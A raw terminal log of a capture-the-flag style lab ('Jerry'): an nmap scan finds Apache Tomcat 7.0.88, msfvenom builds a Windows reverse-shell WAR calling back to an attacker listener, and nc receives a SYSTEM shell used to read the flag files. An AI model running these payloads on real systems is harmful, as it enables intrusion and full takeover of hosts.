┌──(root㉿kali)-[/home/kali/labs/Jerry]
└─# nmap -sC -sV 10.129.48.171
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-29 17:55 +04
Nmap scan report for 10.129.48.171
Host is up (0.35s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.04 seconds
┌──(root㉿kali)-[/home/kali/labs/Jerry]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.143 LPORT=9002 -f war > rev_shell-9002.war
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of war file: 52305 bytes
┌──(root㉿kali)-[/home/kali/labs/Jerry]
└─# ls
rev_shell-9002.war
┌──(root㉿kali)-[/home/kali/labs/Jerry]
└─# jar -ft rev_shell-9002.war
META-INF/
META-INF/MANIFEST.MF
WEB-INF/
WEB-INF/web.xml
ctrvfobuy.jsp
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.48.171] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,419,417,088 bytes free
C:\Users\Administrator\Desktop\flags>type 2*
type 2*
2 for the price of 1.txt
user.txt
***
root.txt
***
C:\Users\Administrator\Desktop\flags>